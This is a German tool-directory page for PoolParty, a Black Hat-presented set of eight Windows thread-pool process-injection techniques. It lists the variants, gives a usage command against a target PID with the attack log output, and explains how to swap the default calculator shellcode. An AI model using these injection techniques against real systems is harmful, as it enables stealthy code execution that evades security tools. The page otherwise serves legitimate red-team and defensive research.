Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoolParty — Eine Reihe von vollständig unentdeckbaren Prozessinjektionstechniken, die Windows-Threadpools missbrauchen. | Kitploit
Tools/GitHubGitHub/safebreach-labs/poolparty
Privilege EscalationExploitationShellcodePost-ExploitationRed TeamingPayload-Entwicklung
GitHubsafebreach-labs/poolparty

PoolParty

Eine Reihe von vollständig unentdeckbaren Prozessinjektionstechniken, die Windows-Threadpools missbrauchen.

Repository anzeigen
1.3k179vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoolParty

Eine Sammlung von vollständig unerkennbaren Prozessinjektionstechniken, die Windows-Thread-Pools missbrauchen. Vorgestellt auf den Black Hat EU 2023 Briefings unter dem Titel - Die Pool-Party, die Sie nie vergessen werden: Neue Prozessinjektionstechniken unter Verwendung von Windows-Thread-Pools

PoolParty-Varianten

Varianten-IDVariantenbeschreibung
1Überschreiben Sie die Startroutine der Ziel-Worker-Factory
2Einfügen eines TP_WORK-Arbeitselements in den Thread-Pool des Zielprozesses
3Einfügen eines TP_WAIT-Arbeitselements in den Thread-Pool des Zielprozesses
4Einfügen eines TP_IO-Arbeitselements in den Thread-Pool des Zielprozesses
5Einfügen eines TP_ALPC-Arbeitselements in den Thread-Pool des Zielprozesses
6Einfügen eines TP_JOB-Arbeitselements in den Thread-Pool des Zielprozesses
7Einfügen eines TP_DIRECT-Arbeitselements in den Thread-Pool des Zielprozesses
8Einfügen eines TP_TIMER-Arbeitselements in den Thread-Pool des Zielprozesses

Verwendung

root@kitploit:~
PoolParty.exe -V <VARIANT-ID> -P <ZIEL-PID>

Anwendungsbeispiele

Einfügen eines TP_TIMER-Arbeitselements in Prozess-ID 1234

root@kitploit:~
>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

Standard-Shellcode und Anpassung

Der Standard-Shellcode startet einen Taschenrechner über die WinExec-API.

Um das auszuführende Programm anzupassen, ändern Sie den Pfad am Ende der Variable g_Shellcode in der Datei main.cpp.

Autor - Alon Leviev

  • LinkedIn - Alon Leviev
  • Twitter - @_0xDeku
Tool herunterladen